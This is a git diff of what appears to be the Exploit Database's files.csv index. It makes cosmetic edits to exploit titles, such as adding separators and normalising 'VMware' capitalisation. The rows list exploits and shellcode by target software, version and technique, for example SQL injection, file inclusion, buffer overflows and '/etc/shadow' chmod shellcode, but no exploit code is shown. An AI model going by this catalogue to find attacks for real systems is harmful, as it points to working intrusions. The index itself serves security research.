diff --git a/files.csv b/files.csv index 8b36d3fd7..a9975da48 100755 --- a/files.csv +++ b/files.csv @@ -1890,7 +1890,7 @@ id,file,description,date,author,platform,type,port 2192,platforms/php/webapps/2192.txt,"OPT Max 1.2.0 - (CRM_inc) Remote File Inclusion",2006-08-16,Kacper,php,webapps,0 2193,platforms/linux/local/2193.php,"PHP 4.4.3 / 5.1.4 - (sscanf) Local Buffer Overflow Exploit",2006-08-16,Andi,linux,local,0 2194,platforms/windows/dos/2194.pl,"Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC",2006-08-16,Preddy,windows,dos,0 -2195,platforms/windows/dos/2195.html,"VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0 +2195,platforms/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0 2196,platforms/php/webapps/2196.txt,"Mambo CopperminePhotoGalery Component Remote Include",2006-08-16,k1tk4t,php,webapps,0 2198,platforms/php/webapps/2198.php,"CubeCart 3.0.11 - (oid) Remote Blind SQL Injection Exploit",2006-08-17,rgod,php,webapps,0 2199,platforms/php/webapps/2199.txt,"IRSR 0.2 - (_sysSessionPath) Remote File Inclusion",2006-08-17,Kacper,php,webapps,0 @@ -3891,7 +3891,7 @@ id,file,description,date,author,platform,type,port 4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - (new_images.php) Remote Blind SQL Injection Exploit",2007-07-29,EgiX,php,webapps,0 4243,platforms/linux/remote/4243.c,"CoreHTTP 0.5.3alpha (httpd) - Remote Buffer Overflow Exploit",2007-07-29,vade79,linux,remote,80 4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 - (vielib.dll 2.2.5.42958) Remode Code Execution Exploit",2007-07-29,callAX,windows,remote,0 -4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 CreateProcess Remote Code Execution Exploit",2007-07-30,callAX,windows,remote,0 +4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 - CreateProcess Remote Code Execution Exploit",2007-07-30,callAX,windows,remote,0 4246,platforms/php/webapps/4246.txt,"wolioCMS Auth Bypass / SQL Injection",2007-07-30,k1tk4t,php,webapps,0 4247,platforms/windows/remote/4247.c,"Borland Interbase 2007 SP1 Create-Request Remote Overflow Exploit",2007-07-30,BackBone,windows,remote,3050 4248,platforms/php/webapps/4248.txt,"Joomla Component com_gmaps 1.00 - (mapId) SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0 @@ -5865,7 +5865,7 @@ id,file,description,date,author,platform,type,port 6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) Remote Arbitrary File Upload",2008-08-18,InjEctOr5,php,webapps,0 6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injection",2008-08-18,cOndemned,php,webapps,0 6261,platforms/php/webapps/6261.txt,"php live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0 -6262,platforms/windows/dos/6262.txt,"VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS",2008-08-18,g_,windows,dos,0 +6262,platforms/windows/dos/6262.txt,"VMware Workstation - (hcmon.sys 6.0.0.45731) Local DoS",2008-08-18,g_,windows,dos,0 6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 - (configure) Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps,0 6270,platforms/php/webapps/6270.txt,"SFS Affiliate Directory (id) SQL Injection",2008-08-19,"Hussin X",php,webapps,0 6271,platforms/php/webapps/6271.txt,"Ad Board (id) SQL Injection",2008-08-19,"Hussin X",php,webapps,0 @@ -5930,7 +5930,7 @@ id,file,description,date,author,platform,type,port 6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - (go) SQL Injection",2008-09-01,e.wiZz!,php,webapps,0 6343,platforms/php/webapps/6343.txt,"CMSbright (id_rub_page) SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0 6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0 -6345,platforms/windows/dos/6345.html,"VMware COM API ActiveX Remote Buffer Overflow PoC",2008-09-01,shinnai,windows,dos,0 +6345,platforms/windows/dos/6345.html,"VMware - COM API ActiveX Remote Buffer Overflow PoC",2008-09-01,shinnai,windows,dos,0 6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - (uid) SQL Injection Exploit",2008-09-01,"Virangar Security",php,webapps,0 6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - (artid) SQL Injection",2008-09-02,MustLive,php,webapps,0 6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 - (id) SQL Injection",2008-09-02,"Hussin X",php,webapps,0 @@ -7089,7 +7089,7 @@ id,file,description,date,author,platform,type,port 7546,platforms/php/webapps/7546.txt,"Joomla Component Volunteer 2.0 - (job_id) SQL Injection",2008-12-22,boom3rang,php,webapps,0 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (.Skin) Local Buffer Overflow Exploit (Python)",2008-12-22,"Encrypt3d.M!nd ",windows,local,0 7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 - (Forum) Remote Cookies Disclosure Exploit",2008-12-22,StAkeR,php,webapps,0 -7549,platforms/php/webapps/7549.txt,"RoundCube Webmail 0.2-3 beta Code Execution",2008-12-22,"Jacobo Gimeno",php,webapps,0 +7549,platforms/php/webapps/7549.txt,"RoundCube Webmail 0.2-3 beta - Code Execution",2008-12-22,"Jacobo Avariento",php,webapps,0 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation Exploit",2008-12-22,"Jon Oberheide",multiple,local,0 7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - (Auth Bypass) SQL Injection",2008-12-22,StAkeR,php,webapps,0 7552,platforms/php/webapps/7552.txt,"REDPEACH CMS (zv) SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0 @@ -9438,9 +9438,9 @@ id,file,description,date,author,platform,type,port 10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - DoS",2009-10-02,PLATEN,windows,dos,21 10074,platforms/novell/webapps/10074.txt,"Novell eDirectory 8.8 SP5 - 'dconserv.dlm' Cross-Site Scripting",2009-10-01,"Francis Provencher",novell,webapps,8030 10075,platforms/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 - XSS",2009-09-23,"Francis Provencher",novell,webapps,8030 -10076,platforms/osx/local/10076.c,"VMWare Fusion 2.0.5 - vmx86 kext Kernel Local Root Exploit",2009-10-02,mu-b,osx,local,0 +10076,platforms/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Local Root Exploit",2009-10-02,mu-b,osx,local,0 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389 -10078,platforms/osx/local/10078.c,"VMWare Fusion 2.0.5 vmx86 kext Local PoC",2009-10-02,mu-b,osx,local,0 +10078,platforms/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local PoC",2009-10-02,mu-b,osx,local,0 10079,platforms/windows/remote/10079.txt,"Google Apps mailto uri handler cross-browser Remote command execution",2009-10-01,pyrokinesis,windows,remote,0 33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0 33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 @@ -11129,7 +11129,7 @@ id,file,description,date,author,platform,type,port 12185,platforms/php/webapps/12185.txt,"Joomla Component com_flexicontent Local File",2010-04-12,eidelweiss,php,webapps,0 12186,platforms/php/dos/12186.pl,"vBulletin - DoS",2010-04-12,"Jim Salim",php,dos,0 12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 beta - (RFI/LFI) Multiple File Include",2010-04-12,"cr4wl3r ",php,webapps,0 -12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - format string",2010-04-12,"Alexey Sintsov",multiple,dos,0 +12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - Format String",2010-04-12,"Alexey Sintsov",multiple,dos,0 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 12190,platforms/php/webapps/12190.txt,"Joomla Component Jvehicles (aid) SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0 12191,platforms/php/webapps/12191.txt,"joomla component com_jp_jobs 1.2.0 - (id) SQL Injection",2010-04-13,v3n0m,php,webapps,0 @@ -13154,7 +13154,7 @@ id,file,description,date,author,platform,type,port 15098,platforms/php/webapps/15098.txt,"FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0 15114,platforms/php/webapps/15114.php,"Zenphoto - Config Update and Command Execute",2010-09-26,Abysssec,php,webapps,0 15102,platforms/win_x86/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery Add Admin Account",2010-09-24,"John Johnz",win_x86,webapps,80 -15103,platforms/windows/dos/15103.py,"VMware Workstation 7.1.1 VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0 +15103,platforms/windows/dos/15103.py,"VMware Workstation 7.1.1 - VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0 15104,platforms/windows/dos/15104.py,"Mozilla Firefox CSS - font-face Remote Code Execution",2010-09-25,Abysssec,windows,dos,0 15106,platforms/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0 @@ -13644,7 +13644,7 @@ id,file,description,date,author,platform,type,port 15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - CSRF",2010-12-09,"Anatolia Security",multiple,webapps,0 15711,platforms/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - LFI Exploit",2010-12-09,Br0ly,php,webapps,0 15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0 -15717,platforms/multiple/remote/15717.txt,"VMware Tools update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote,0 +15717,platforms/multiple/remote/15717.txt,"VMware Tools - Update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote,0 15714,platforms/php/webapps/15714.txt,"Joomla JE Auto Component 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps,0 15715,platforms/php/webapps/15715.txt,"CMScout 2.09 - CSRF",2010-12-09,"High-Tech Bridge SA",php,webapps,0 15720,platforms/php/webapps/15720.txt,"Sulata iSoft (stream.php) Local File Disclosure Exploit",2010-12-10,Sudden_death,php,webapps,0 @@ -15752,7 +15752,7 @@ id,file,description,date,author,platform,type,port 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0 18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8",2011-11-20,Metasploit,windows,remote,0 18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS (Metasploit)",2011-11-21,hellok,win_x86,local,0 -18138,platforms/windows/remote/18138.txt,"VMware Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0 +18138,platforms/windows/remote/18138.txt,"VMware - Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0 18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen",2011-11-21,instruder,windows,dos,0 18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (.WAV) Stack Buffer Overflow",2011-11-22,Metasploit,windows,local,0 18143,platforms/windows/local/18143.rb,"Microsoft Office Excel Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,Metasploit,windows,local,0 @@ -16763,7 +16763,7 @@ id,file,description,date,author,platform,type,port 19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay",1999-06-15,"Robert Lister",multiple,dos,0 19369,platforms/windows/remote/19369.rb,"Adobe Flash Player Object Type Confusion",2012-06-25,Metasploit,windows,remote,0 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow",1999-06-25,KSR[T],linux,local,0 -19371,platforms/linux/local/19371.c,"VMWare 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0 +19371,platforms/linux/local/19371.c,"VMware 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0 19372,platforms/windows/dos/19372.txt,"Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name",1999-06-28,"J D Glaser",windows,dos,0 19373,platforms/linux/local/19373.c,"Debian Linux 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux 6.1 - Lsof Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0 19374,platforms/linux/local/19374.c,"Debian Linux 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux 6.1 - Lsof Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 @@ -18916,7 +18916,7 @@ id,file,description,date,author,platform,type,port 21636,platforms/windows/remote/21636.txt,"Opera 6.0.1_Microsoft Internet Explorer 5/6 - JavaScript Modifier Keypress Event Subversion",2002-07-23,"Andreas Sandblad",windows,remote,0 21637,platforms/hardware/dos/21637.c,"ZyXEL Prestige 642R Router - Malformed IP Packet Denial of Service",2002-07-24,"Jeff w. Roberson",hardware,dos,0 21638,platforms/multiple/remote/21638.txt,"Mozilla 0.9.x/1.0 JavaScript URL Host Spoofing Arbitrary Cookie Access",2002-07-24,"Andreas Sandblad",multiple,remote,0 -21639,platforms/windows/remote/21639.c,"VMWare GSX Server 2.0 - Authentication Server Buffer Overflow",2002-07-24,"Zag & Glcs",windows,remote,0 +21639,platforms/windows/remote/21639.c,"VMware GSX Server 2.0 - Authentication Server Buffer Overflow",2002-07-24,"Zag & Glcs",windows,remote,0 21640,platforms/php/webapps/21640.txt,"Cobalt Qube 3.0 - Authentication Bypass",2002-07-24,pokley,php,webapps,0 21641,platforms/cgi/remote/21641.txt,"GNU Mailman 2.0.x Subscribe Cross-Site Scripting",2002-07-24,office,cgi,remote,0 21642,platforms/cgi/remote/21642.txt,"GNU Mailman 2.0.x Admin Login Variant Cross-Site Scripting",2002-07-24,office,cgi,remote,0 @@ -24169,7 +24169,7 @@ id,file,description,date,author,platform,type,port 27043,platforms/hardware/dos/27043.py,"Samsung PS50C7700 TV - Denial of Service",2013-07-23,"Malik Mesellem",hardware,dos,5600 27044,platforms/hardware/remote/27044.rb,"D-Link Devices UPnP SOAP Command Execution",2013-07-23,Metasploit,hardware,remote,0 27045,platforms/linux/remote/27045.rb,"Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection",2013-07-23,Metasploit,linux,remote,443 -27046,platforms/windows/remote/27046.rb,"VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload",2013-07-23,Metasploit,windows,remote,443 +27046,platforms/windows/remote/27046.rb,"VMware vCenter - Chargeback Manager ImageUploadServlet Arbitrary File Upload",2013-07-23,Metasploit,windows,remote,443 27047,platforms/windows/dos/27047.txt,"Artweaver 3.1.5 - (.awd) Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0 27049,platforms/windows/dos/27049.txt,"XnView 2.03 - (.pct) Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 @@ -25128,7 +25128,7 @@ id,file,description,date,author,platform,type,port 28045,platforms/php/webapps/28045.txt,"dotWidget for articles 2.0 admin/categories.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 28063,platforms/php/webapps/28063.txt,"e107 0.7.5 - Search.php Cross-Site Scripting",2006-06-19,securityconnection,php,webapps,0 28064,platforms/php/webapps/28064.txt,"Qto File Manager 1.0 index.php Cross-Site Scripting",2006-03-06,alijsb,php,webapps,0 -28065,platforms/multiple/dos/28065.vmx,"VMware Player 1.0.1 Build 19317 Malformed VMX File Denial of Service",2006-06-19,n00b,multiple,dos,0 +28065,platforms/multiple/dos/28065.vmx,"VMware Player 1.0.1 Build 19317 - Malformed VMX File Denial of Service",2006-06-19,n00b,multiple,dos,0 28066,platforms/php/webapps/28066.txt,"singapore 0.9.x/0.10 - Multiple Parameter Traversal Arbitrary File Access",2006-06-19,simo64,php,webapps,0 28067,platforms/php/webapps/28067.txt,"singapore 0.9.x/0.10 index.php template Parameter XSS",2006-06-19,simo64,php,webapps,0 28068,platforms/php/webapps/28068.txt,"V3 Chat Instant Messenger - mail/index.php id Parameter XSS",2006-06-20,Luny,php,webapps,0 @@ -25298,7 +25298,7 @@ id,file,description,date,author,platform,type,port 28237,platforms/windows/dos/28237.py,"Target Longlife Media Player 2.0.2.0 - (.wav) Crash PoC",2013-09-12,gunslinger_,windows,dos,0 28238,platforms/windows/webapps/28238.txt,"Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling (MS13-067)",2013-09-12,Vulnerability-Lab,windows,webapps,0 28239,platforms/hardware/webapps/28239.txt,"D-Link DSL-2740B - Multiple CSRF Vulnerabilities",2013-09-12,"Ivano Binetti",hardware,webapps,0 -28395,platforms/windows/dos/28395.txt,"VMware 5.5.1 Partition Table Deletion Denial of Service",2006-08-15,nop,windows,dos,0 +28395,platforms/windows/dos/28395.txt,"VMware 5.5.1 - Partition Table Deletion Denial of Service",2006-08-15,nop,windows,dos,0 28243,platforms/linux/webapps/28243.txt,"Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities",2013-09-12,"Andrea Fabrizi",linux,webapps,0 28244,platforms/windows/dos/28244.txt,"Microsoft Internet Explorer 6.0 DataSourceControl Denial of Service",2006-07-19,hdm,windows,dos,0 28245,platforms/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss Command Execution",2006-07-19,"Jon Hart",hardware,remote,0 @@ -30057,7 +30057,7 @@ id,file,description,date,author,platform,type,port 33307,platforms/php/webapps/33307.php,"RunCMS 'forum' Parameter SQL Injection",2009-10-26,Nine:Situations:Group::bookoo,php,webapps,0 33308,platforms/php/webapps/33308.txt,"Sahana 0.6.2 - 'mod' Parameter Local File Disclosure",2009-10-27,"Greg Miernicki",php,webapps,0 33309,platforms/php/webapps/33309.txt,"TFTgallery 0.13 - 'album' Parameter Cross-Site Scripting",2009-10-26,blake,php,webapps,0 -33310,platforms/multiple/remote/33310.nse,"VMware Server 2.0.1_ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",multiple,remote,0 +33310,platforms/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",multiple,remote,0 33311,platforms/linux/remote/33311.txt,"KDE 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0 33312,platforms/linux/dos/33312.txt,"Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow",2009-10-27,"Alin Rad Pop",linux,dos,0 33313,platforms/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 and SeaMonkey 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,linux,remote,0 @@ -30595,7 +30595,7 @@ id,file,description,date,author,platform,type,port 33937,platforms/multiple/webapps/33937.txt,"TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps,0 33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router 'Stat_Radio' Parameter Cross-Site Scripting",2010-02-04,"Karn Ganeshen",hardware,remote,0 33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 - 'errinfo' Parameter Cross-Site Scripting",2010-02-06,"cp77fk4r ",java,webapps,0 -33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x URL Processing Cross-Site Scripting",2010-05-05,"Alexey Sintsov",multiple,remote,0 +33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x - URL Processing Cross-Site Scripting",2010-05-05,"Alexey Sintsov",multiple,remote,0 33941,platforms/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 - 'PlayerOcx.ocx' Active X Control Arbitrary File Overwrite",2010-02-03,"Evdokimov Dmitriy",windows,remote,0 33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80 33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 < 4.3.3 - Aribtrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080 @@ -33390,7 +33390,7 @@ id,file,description,date,author,platform,type,port 37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0 37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php param Parameter Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 -37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - SQL Injection",2015-05-13,Wadeek,php,webapps,0 +37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - (deletetopics.php) SQL Injection",2015-05-13,Wadeek,php,webapps,0 37007,platforms/linux/remote/37007.txt,"AtMail 1.04 - Multiple Security Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0 37008,platforms/php/webapps/37008.txt,"Event Calendar PHP 'cal_year' Parameter Cross-Site Scripting",2012-03-24,3spi0n,php,webapps,0 37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 - 'XSLTResult.java' Remote Arbitrary File Upload",2012-03-23,voidloafer,java,webapps,0 @@ -33636,13 +33636,13 @@ id,file,description,date,author,platform,type,port 37306,platforms/linux/dos/37306.txt,"Mosh Remote Denial of Service",2012-05-22,"Timo Juhani Lindfors",linux,dos,0 37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0 37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0 -37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0 +37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0 37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Inclusion",2012-05-23,AkaStep,php,webapps,0 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x module.php Multiple Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 modules.php URI XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37314,platforms/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 Local File Disclosure",2012-05-23,L3b-r1'z,php,webapps,0 -37315,platforms/php/webapps/37315.txt,"phpCollab 2.5 uploadfile.php Crafted Request Arbitrary Non-PHP File Upload",2012-05-24,"team ' and 1=1--",php,webapps,0 +37315,platforms/php/webapps/37315.txt,"phpCollab 2.5 - uploadfile.php Crafted Request Arbitrary Non-PHP File Upload",2012-05-24,"team ' and 1=1--",php,webapps,0 37257,platforms/php/webapps/37257.txt,"FiverrScript - CSRF (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80 37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443 @@ -33667,7 +33667,7 @@ id,file,description,date,author,platform,type,port 37281,platforms/php/webapps/37281.txt,"concrete5 index.php/tools/required/files/import Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37283,platforms/php/webapps/37283.txt,"AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",php,webapps,0 -37316,platforms/php/webapps/37316.txt,"phpCollab 2.5 Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' and 1=1--",php,webapps,0 +37316,platforms/php/webapps/37316.txt,"phpCollab 2.5 - Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' and 1=1--",php,webapps,0 37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod() 777 /etc/shadow & exit() shellcode (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service",2015-06-15,3unnym00n,windows,dos,0 37287,platforms/windows/dos/37287.html,"Cisco AnyConnect Secure Mobility 2.x/3.x/4.x - Client DoS PoC",2015-06-15,LiquidWorm,windows,dos,0 @@ -36344,12 +36344,12 @@ id,file,description,date,author,platform,type,port 40190,platforms/php/webapps/40190.txt,"WordPress WP Live Chat Support Plugin 6.2.03 - Stored XSS",2016-08-01,"Dennis Kerdijk & Erwin Kievith",php,webapps,80 40191,platforms/php/webapps/40191.txt,"WordPress ALO EasyMail Newsletter Plugin 2.9.2 - (Add/Import Arbitrary Subscribers) CSRF",2016-08-01,"Yorick Koster",php,webapps,80 40192,platforms/windows/dos/40192.py,"Halliburton LogView Pro 9.7.5 - (.cgm/.tif/.tiff/.tifh) Crash PoC",2016-08-01,"Karn Ganeshen",windows,dos,0 -40194,platforms/multiple/dos/40194.txt,"Wireshark 1.12.0 to 1.12.12 - NDS Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0 +40194,platforms/multiple/dos/40194.txt,"Wireshark 1.12.0 - 1.12.12 - NDS Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0 40195,platforms/multiple/dos/40195.txt,"Wireshark 2.0.0 to 2.0.4 - MMSE_ WAP_ WBXML_ and WSP Dissectors Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0 -40196,platforms/win_x86-64/dos/40196.txt,"Wireshark 2.0.0 to 2.0.4 - CORBA IDL Dissectors Denial of Service",2016-08-03,Igor,win_x86-64,dos,0 -40197,platforms/multiple/dos/40197.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - PacketBB Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0 -40198,platforms/multiple/dos/40198.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0 -40199,platforms/multiple/dos/40199.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0 +40196,platforms/win_x86-64/dos/40196.txt,"Wireshark 2.0.0 - 2.0.4 - CORBA IDL Dissectors Denial of Service",2016-08-03,Igor,win_x86-64,dos,0 +40197,platforms/multiple/dos/40197.txt,"Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - PacketBB Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0 +40198,platforms/multiple/dos/40198.txt,"Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0 +40199,platforms/multiple/dos/40199.txt,"Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0 40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier 